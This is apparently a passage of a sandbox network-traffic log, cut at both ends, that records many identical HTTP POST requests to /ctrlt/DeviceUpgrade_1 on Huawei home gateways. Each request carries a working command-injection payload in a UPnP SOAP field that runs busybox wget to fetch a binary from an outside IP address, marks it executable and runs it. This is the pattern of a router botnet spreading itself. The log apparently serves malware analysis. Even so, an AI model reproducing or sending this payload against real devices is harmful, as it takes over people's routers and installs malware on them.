                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889949083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241714001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945394039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376601934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191235065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      117192.168.2.1449618156.224.62.237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.736602068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658020020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.745960951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889949083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241714001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945394039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
